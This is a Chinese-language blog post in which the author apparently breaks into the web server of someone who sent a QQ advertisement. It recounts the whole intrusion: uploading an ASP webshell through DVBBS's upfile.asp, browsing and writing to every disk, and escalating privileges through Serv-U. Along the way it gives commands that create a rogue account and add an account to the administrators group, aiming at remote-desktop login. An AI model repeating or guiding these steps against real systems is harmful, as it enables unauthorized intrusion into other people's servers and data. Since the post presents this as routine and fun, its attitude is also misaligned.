今天下午在上网,一个QQ号接到某些人用那个QQ发言软件发来的消息,反正就是广告好了,但是也没太黄,或者太难听,就是宣传自己的主页的,一般碰到这样的情况我都爱理不理,正好看到他和我是一个地方的,我们这小山钩钩还有人会在网上发布消息,真晕哦。不行,得去看一看,我没有直接打开,(我也怕里面有网页木马),好吧,用明小子的Domain,就是那个旁注工具,一般我都喜欢先看一下,扫到一个upfile.asp,是DVBBS,很容易的上传一个马,好了,进入,我使用的是冰点的2005.asp和火狐专用版4.asp,(其实我还是比较喜欢用老兵的木马,但是不知道什么原因不能用了,555,技术菜真汗。~~~)好了,废话不说了,开工。
我主要介绍一下建立管理员的过程,好,先看看能打开别的盘不能,
哇,这个服务器很好,可以浏览整个服务器里硬盘里的所有数据,而且还可以写入
使用一下netuser
返回的提示信息显示,只有默认的几个帐户,嘿,
在试一下
netuserxiaofeixiaofei/add ps:建立一个xiaofei的用户名密码也是xiaofei
ASP木马没有显示,哎看来不行,我还没有试过直接可以用ASP木马建立用户名的服务器呢,(其实以前也没有成功过)
哎那就在换别的方法
好的,看他用PCANYWHERE了吗,一般使用这个作为网站管理的比较多。
找一下他的默认目录:
C:/DocumentsandSettings/AllUsers/ApplicationData/Symantec/pcAnywhere/
哎,这个服务器也没有装,难道没有方法建立用户名了吗?
在找找,在D盘里看到了SERU,忘记看版本了,想到可以用工具提权,就糊里糊涂的上传了一个工具上去,找了一个,ok,然后
D:ftp.exe\"netuserxiaofeixiaofei/add\"
提示一大堆返回信息什么的,然后使用了一下netuser看到xiaofei这个用户名了,就是成功了。
D:ftp.exe\"netuserxiaofeixiaofei/add\"
继续提权,在继续输入
D:ftp.exe\"netlocalgroupadministratorsguest/add“
从建立用户到3389登陆
相关文章